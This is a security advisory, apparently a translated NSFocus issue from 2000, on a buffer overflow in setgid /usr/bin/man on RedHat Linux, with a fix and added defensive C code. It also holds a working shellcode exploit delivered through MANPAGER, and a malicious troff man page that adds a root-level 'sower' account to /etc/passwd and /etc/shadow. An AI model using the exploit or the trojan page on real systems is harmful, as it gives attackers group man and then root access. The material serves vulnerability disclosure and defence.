NSFocus Security Monthly, Issue 7: Latest Vulnerabilities

RedHat man Buffer Overflow Vulnerability

Date: 2000-05-23

Affected systems:
RedHat Linux 6.2
RedHat Linux 6.1
RedHat Linux 6.0
RedHat Linux 5.2
RedHat Linux 5.1
RedHat Linux 5.0
RedHat Linux 4.2
RedHat Linux 4.1
RedHat Linux 4.0

--------------------------------------------------------------------------------
Description:


On most Linux distributions, /usr/bin/man is installed setgid man. The bit is there so that man can write preformatted pages into /var/catman and speed up later lookups. However, man repeatedly uses sprintf to copy user-supplied data into fixed-size buffers without checking its length. A local user can therefore supply an overlong string, overflow one of those buffers, gain the privileges of group man, and from there possibly escalate to root.

For example, setting the MANPAGER environment variable to a string of more than 4000 'A's overflows the buffer:


$ MANPAGER=`perl -e '{print "A"x4000}'` man ls


[...]


1200 setuid(500) = 0
1200 setgid(15) = 0
1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 close(-1) = -1 EBADF (Bad file descriptor)
1200 write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
1200 --- SIGSEGV (Naruszenie ochrony pamięci) ---
1200 +++ killed by SIGSEGV +++


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
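The sprintf pattern the advisory describes, shown beside a bounded replacement, as an added example that is not code from man or from the advisory. CMD_SIZE, the command template "(cd /usr/man ; %s %s)" and the function names are assumptions made for illustration; they are not taken from man's source.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not man's code. CMD_SIZE and the template are assumed. */
#define CMD_SIZE 1024

/* Vulnerable shape. `cmdsz` is accepted but ignored, which is exactly the
 * defect: sprintf copies an attacker-chosen pager into a fixed buffer with
 * no length check, so a MANPAGER of a few thousand bytes overruns `cmd`. */
int build_pager_cmd_unsafe(char *cmd, size_t cmdsz, const char *pager, const char *page)
{
    (void)cmdsz;
    sprintf(cmd, "(cd /usr/man ; %s %s)", pager, page);
    return 0;
}

/* Hardened shape: snprintf never writes past cmdsz, and its return value
 * says whether the whole string fit. Truncation is treated as an error
 * instead of silently handing a clipped command to the shell. */
int build_pager_cmd_safe(char *cmd, size_t cmdsz, const char *pager, const char *page)
{
    int n = snprintf(cmd, cmdsz, "(cd /usr/man ; %s %s)", pager, page);
    if (n < 0 || (size_t)n >= cmdsz) {
        cmd[0] = '\0';          /* reject: does not fit the buffer */
        return -1;
    }
    return 0;
}

/* Constructed input mirroring the advisory's perl -e 'print "A"x4000':
 * a pager string of `len` 'A's in static storage (capped at 8000). */
const char *long_pager(size_t len)
{
    static char buf[8001];
    if (len > 8000) len = 8000;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return buf;
}

static char g_cmd[CMD_SIZE];

/* Runs the hardened builder for `pager` against a CMD_SIZE buffer and
 * returns its status; last_cmd() exposes the resulting command string. */
int try_pager(const char *pager)
{
    return build_pager_cmd_safe(g_cmd, sizeof g_cmd, pager, "ls");
}

const char *last_cmd(void)
{
    return g_cmd;
}

int main(void)
{
    char cmd[CMD_SIZE];

    /* Short pager: both variants behave the same. */
    build_pager_cmd_unsafe(cmd, sizeof cmd, "less", "ls");
    printf("unsafe, short pager: %s\n", cmd);

    /* 4000-byte pager: the unsafe variant would smash the stack here, so
     * only the bounded one is called with it. */
    printf("safe, 4000-byte pager: %s\n",
           try_pager(long_pager(4000)) == 0 ? "built" : "rejected");
    return 0;
}
```

The bounded copy only stops the overflow. The pager string is still handed to a shell, so a setgid program should additionally validate or refuse a caller-supplied pager rather than trust its contents.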


With the privileges of group man, a user can read and write /var/catman and some files under /usr/man. Normally the man pages under /usr/man are not writable by group man, but some packages may leave their pages group-writable. A user could then plant a malicious man page; when root views that program's page, the commands embedded in it run with root's privileges, and the attacker may obtain root.

<* Source: Michal Zalewski (lcamtuf@DIONE.IDS.PL) *>


--------------------------------------------------------------------------------
Test program:

/*  /usr/bin/man overflow local exploit for Linux.
 *  Tested in RedHat 6.1 (2.2.14), RedHat 6.0 (ALIGN=0)
 *  It will give you gid "man" privileges, now you can play
 *  with /var/catman. :-)
 *                          by warning3 <warning3@hotmail.com>
 *                                       http://www.nsfocus.com
 *                                                    y2k/2/28
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* The default BUFSIZE and ALIGN values were lost to encoding damage in
 * this copy; 4000 matches the advisory's proof of concept and 0 is the
 * alignment the header comment gives for RedHat 6.0, so both are
 * assumptions here. Each can be overridden from the command line.
 * i386 only: get_esp() reads %esp. */
#define BUFSIZE   4000
#define OFFSET    20000
#define ALIGN     0
#define NOP       0x90

/* Current stack pointer, used as the base for guessing where the NOP
 * sled will sit once it is in man's environment block. */
unsigned long get_esp(void)
{
    unsigned long esp;
    __asm__("movl %%esp,%0" : "=r"(esp));
    return esp;
}

/* Classic Linux/x86 execve("/bin/sh") shellcode. */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv)
{
    char *buf;
    int bufsize = BUFSIZE, offset = OFFSET, align = ALIGN;
    int i;
    long address, *ptr;

    if (argc > 1) bufsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (argc > 3) align = atoi(argv[3]);

    if (!(buf = malloc(bufsize))) {
        printf("Can not allocate enough memory!\n");
        exit(1);
    }
    memset(buf, 'A', bufsize);
    address = get_esp() - offset;
    printf("Using address: 0x%lx\n", address);

    /* Fill the buffer with the guessed return address, one word at a time
     * starting at `align`, so whichever word lands on the saved return
     * address points into the sled. Stops before a trailing partial word
     * so the write never runs past the allocation. */
    ptr = (long *)(buf + align);
    for (i = align; i + 4 <= bufsize; i += 4)
        *(ptr++) = address;

    /* Front half becomes a NOP sled; the shellcode sits in the middle. */
    memset(buf, NOP, bufsize / 2);
    memcpy(buf + bufsize / 2 - strlen(shellcode) / 2, shellcode, strlen(shellcode));
    *(buf + bufsize - 1) = '\0';

    /* Deliver the payload through MANPAGER, the variable man copies with
     * sprintf into a fixed-size buffer. */
    memcpy(buf, "MANPAGER=", 9);
    putenv(buf);
    execl("/usr/bin/man", "man", "ls", NULL);
    return 1;
}

Sample malicious man page provided by Pawel Wilk <siewca@dione.ids.pl>:

----------------------mkroot.9---------------------------

.\" Copyright (c) 1999 Pawe?Wilk <siewca@dione.ids.pl>
.\"
.\" This is free documentation; you can redistribute it and/or
.\" modify it under the terms of the GNU General Public License as
.\" published by the Free Software Foundation; either version 2 of
.\" the License, or (at your option) any later version.
.\"
.\" The GNU General Public License's references to "object code"
.\" and "executables" are to be interpreted as the output of any
.\" document formatting or typesetting system, including
.\" intermediate and printed output.
.\"
.\" This manual is distributed in the hope that it will be useful,
.\" but WITHOUT ANY WARRANTY; without even the implied warranty of
.\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.牋See the
.\" GNU General Public License for more details.
.\"
.\" You should have received a copy of the GNU General Public
.\" License along with this manual; if not, write to the Free
.\" Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139,
.\" USA.
.\"
.TH MKROOT 9 "07-22-1999" "manual page" "Linux Hacker's Manual"
.SH NAME
.! .psobyk
mkroot \- make a root-shell
.SH SYNOPSIS
.BI "man mkroot"
.SH DISCLAIMER
This manual page contains some \fBtroff\fP macros which could break your system's
security. If you are looking at this page being logged as root then you should know
that right in this moment you have allready created new, privileged account
called "sower". The account is disabled by default because of security reasons.
Don't forget to remove it! ;->

This is for information only.... use it at your own risk.

.SH DESCRIPTION
Manual pages are usualy based on \fBtroff\fP (see
.BR troff (1)
) macros. The point is, that some of these macros can access files or
even invoke some shell commands. It's usable, but try to imaginate
that the \fBtroff\fP macros contained in manual pages may have root privileges
if the \fBtroff\fP command's caller is root. (!)
.br
.LP
The most dangerous macros are:
.TP
.BI ".pso" " command"
used to display output of some \fIcommand\fP
.TP
.BI ".write" " stream string"
used to put the \fIstring\fP into the given \fIstream\fP
.LP
.SH EXAMPLES
.BI "/root directory listing" "  .pso ls -l /root"
.nf

.pso ls -l /root

.fi
.BI "creating new user called sower (passwd)" " "
.nf

    .opena stream /etc/passwd
    .write stream sower:*:0:0::/:/dev/null

.fi
.opena stream /etc/passwd
.write stream sower:!:0:0::/:/dev/null
.BI "little preview" "  .pso tail /etc/passwd"
.nf

.pso tail /etc/passwd

.fi

.BI "playing with shadow" ""
.nf

    .opena stream /etc/shadow
    .write stream sower:*:10531:0:99999:7::10794:

.fi
.opena stream /etc/shadow
.write stream sower:*:10531:0:99999:7::10794:
.BI "fingering new user" "    .pso finger sower"
.nf

.pso finger sower

.fi
.SH FILES
.I /etc/passwd
.I /etc/shadow

.SH SEE ALSO
.BR man (1),
.BR passwd (1),
.BR troff (1).

.SH AUTHOR
Pawel Wilk <siewca@dione.ids.pl>
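A scanner for the troff requests that can run commands or write files, as an added example that is not part of the advisory or of Pawel Wilk's page. The request list is this example's choice: the requests groff's safer mode disables (.open, .opena, .pso, .sy, .pi) plus the .write family the page demonstrates. The sample page below is constructed from the mkroot.9 lines above, and the function names are assumptions. It also shows the edge case visible in the page: the indented copies inside the .nf blocks are display text, because troff only honours a request whose control character is in column 0.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not part of the advisory. Request list is this
 * example's choice (groff -S list plus the .write family). */
static const char *const UNSAFE_REQ[] = {
    "pso", "sy", "open", "opena", "pi", "write", "writec", "writem", NULL
};

/* Constructed from the mkroot.9 page above: the indented .opena/.write
 * lines in the .nf block are text; the column-0 ones are real requests. */
static const char SAMPLE_PAGE[] =
    ".TH MKROOT 9 \"07-22-1999\" \"manual page\"\n"
    ".SH EXAMPLES\n"
    ".nf\n"
    "    .opena stream /etc/passwd\n"
    "    .write stream sower:*:0:0::/:/dev/null\n"
    ".fi\n"
    ".opena stream /etc/passwd\n"
    ".write stream sower:!:0:0::/:/dev/null\n"
    ".pso tail /etc/passwd\n"
    ".SH FILES\n";

static int is_unsafe_request(const char *name, size_t len)
{
    for (int i = 0; UNSAFE_REQ[i]; i++)
        if (strlen(UNSAFE_REQ[i]) == len && memcmp(UNSAFE_REQ[i], name, len) == 0)
            return 1;
    return 0;
}

/* Walks `text` line by line. A request is only recognised when the control
 * character ('.' or '\'') is in column 0; an indented ".pso" is ordinary
 * text to troff. Spaces between the control character and the name are
 * tolerated, which errs on the side of over-reporting. Records the 1-based
 * line numbers of hits into `hits` (up to `max`, may be NULL) and returns
 * the total number found. */
int scan_unsafe_requests(const char *text, int *hits, int max)
{
    int count = 0, lineno = 1;
    const char *p = text;

    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);

        if (len > 0 && (p[0] == '.' || p[0] == '\'')) {
            const char *q = p + 1, *end = p + len;
            while (q < end && (*q == ' ' || *q == '\t')) q++;
            const char *name = q;
            while (q < end && isalpha((unsigned char)*q)) q++;
            if (is_unsafe_request(name, (size_t)(q - name))) {
                if (hits && count < max) hits[count] = lineno;
                count++;
            }
        }
        if (!eol) break;
        p = eol + 1;
        lineno++;
    }
    return count;
}

/* Number of unsafe requests in the constructed sample. */
int sample_unsafe_count(void)
{
    return scan_unsafe_requests(SAMPLE_PAGE, NULL, 0);
}

/* Line number of the first real request in the sample, 0 if none. */
int sample_first_unsafe_line(void)
{
    int hits[1];
    return scan_unsafe_requests(SAMPLE_PAGE, hits, 1) > 0 ? hits[0] : 0;
}

int main(void)
{
    int hits[16];
    int n = scan_unsafe_requests(SAMPLE_PAGE, hits, 16);
    printf("%d unsafe request(s) in sample page\n", n);
    for (int i = 0; i < n && i < 16; i++)
        printf("  line %d\n", hits[i]);
    return 0;
}
```

Run it over the troff sources under /usr/man, not over /var/catman: catman holds already formatted output, where any request has long since executed.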




--------------------------------------------------------------------------------
Recommendation:
    Remove the sgid bit from /usr/bin/man: chmod g-s /usr/bin/man. (Note that man will then no longer be able to create preformatted pages in /var/catman.) Confirm the change with ls -l /usr/bin/man: the group permission bits should no longer show an s.


All rights reserved. Reproduction without permission is prohibited.